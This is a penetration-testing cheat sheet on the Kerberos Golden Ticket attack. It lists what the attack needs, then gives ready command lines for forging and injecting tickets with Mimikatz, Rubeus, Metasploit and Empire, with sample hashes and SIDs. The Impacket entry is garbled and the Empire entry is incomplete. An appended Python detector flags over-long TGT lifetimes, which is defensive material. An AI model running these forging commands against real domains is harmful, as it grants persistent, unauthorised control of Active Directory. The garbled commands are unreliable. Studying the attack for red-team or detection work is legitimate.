Kerberos Golden Tickets
Domain Persistence with Kerberos Golden Ticket attack.
Table of contents
- Understanding the Golden Ticket Attack
- Requirements to forge a Golden Ticket
- List of Tools
A Golden Ticket attack is a post-exploitation technique that involves creating a forged Kerberos Ticket-Granting Ticket (TGT) to gain unauthorized access to a network. This attack typically requires compromising the security of a Key Distribution Center (KDC) or domain controller.
ATT&CK ID: T1558.001
Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as golden tickets. Golden tickets enable adversaries to generate authentication material for any account in the Active Directory.
Understanding the Golden Ticket Attack
The Golden Ticket attack exploits weaknesses in the Kerberos authentication protocol, a fundamental component of Active Directory (AD) used for user authentication and authorization.
By forging Kerberos tickets, an attacker (or a security professional on an engagement) gains unauthorized, persistent access to the domain and can move laterally across critical systems and resources.
Requirements to forge a Golden Ticket
After the initial compromise, the attacker escalates privileges to an Administrator account and collects:
- Domain SID (remember to remove the RID at the end of the SID)
- KRBTGT NTLM / AES256 hash
List of Tools
How to Create Golden Tickets with Mimikatz?
mimikatz kerberos::golden /domain:poplabsec.rfs /sid:<string> /user:Administrator /krbtgt:<NTLM Hash> /ptt
How to Create Golden Tickets with Rubeus?
rubeus.exe hash /user:rfs /domain:poplabsec.rfs /password:Password@1
rubeus.exe golden /aes256:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C /ldap /user:rfs /printcmd
How to Create Golden Tickets with Impacket?
administrator:Paa@email@example.com -outputfile krb -user-status
How to Create Golden Tickets with Metasploit?
golden_ticket_create -d poplabsec.rfs -u rfs -s S-1-5-21-3523557010-2506964455-2614950430 -k f3bc61e97fb14d18c42bcbf6c3a9055f -t /root/Desktop/ticket.kirbi
How to Create Golden Tickets with Empire?
set user rfs
set id 500
Golden Ticket Lifetime
Forged tickets are valid for 10 years by default.
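Two defender-side checks tied to the points above, written as an added example (not code from the page or from any of the tools listed): strip_rid() normalizes a domain-account SID to the domain SID the forging tools expect, and suspicious_tgts() parses klist-style cache output and flags any TGT whose validity window exceeds the domain's MaxTicketAge (10 hours by default), which is how a 10-year forged ticket stands out on the host where it was injected. The klist text, domain name and SID are constructed sample values.

```python
import re
from datetime import datetime, timedelta

# Default Windows domain policy caps a TGT at 10 hours; forged tickets default to 10 years.
DEFAULT_MAX_TICKET_AGE = timedelta(hours=10)

def strip_rid(sid: str) -> str:
    """Return the domain SID (S-1-5-21-X-Y-Z), dropping a trailing RID if present."""
    parts = sid.split("-")
    if not sid.startswith("S-1-5-21-") or len(parts) not in (7, 8):
        raise ValueError(f"not a domain or domain-account SID: {sid}")
    return "-".join(parts[:7])

# Constructed klist-style output (not captured from a real host): ticket #1 is a
# forged TGT for Administrator with a 10-year lifetime.
KLIST_SAMPLE = """\
#0>  Client: rfs @ POPLABSEC.RFS
     Server: krbtgt/POPLABSEC.RFS @ POPLABSEC.RFS
     Start Time: 5/1/2024 9:00:00 (local)
     End Time:   5/1/2024 19:00:00 (local)

#1>  Client: Administrator @ POPLABSEC.RFS
     Server: krbtgt/POPLABSEC.RFS @ POPLABSEC.RFS
     Start Time: 5/1/2024 9:00:00 (local)
     End Time:   4/29/2034 9:00:00 (local)
"""

TICKET_RE = re.compile(
    r"Client:\s*(?P<client>\S+).*?Server:\s*(?P<server>\S+).*?"
    r"Start Time:\s*(?P<start>\S+ \S+).*?End Time:\s*(?P<end>\S+ \S+)",
    re.S,
)

def parse_klist(text: str) -> list:
    """Pull client, service and validity window out of each cached ticket."""
    fmt = "%m/%d/%Y %H:%M:%S"
    return [{"client": m["client"], "server": m["server"],
             "start": datetime.strptime(m["start"], fmt),
             "end": datetime.strptime(m["end"], fmt)}
            for m in TICKET_RE.finditer(text)]

def suspicious_tgts(text: str, max_age: timedelta = DEFAULT_MAX_TICKET_AGE) -> list:
    """Clients holding a TGT whose validity window exceeds the domain's MaxTicketAge."""
    return [t["client"] for t in parse_klist(text)
            if t["server"].startswith("krbtgt/") and t["end"] - t["start"] > max_age]
```

This lifetime check only sees tickets cached on the host being inspected; domain-wide coverage needs the 4768/4769 events on the domain controllers, where a TGS request with no matching TGT request for that account is the corresponding signal.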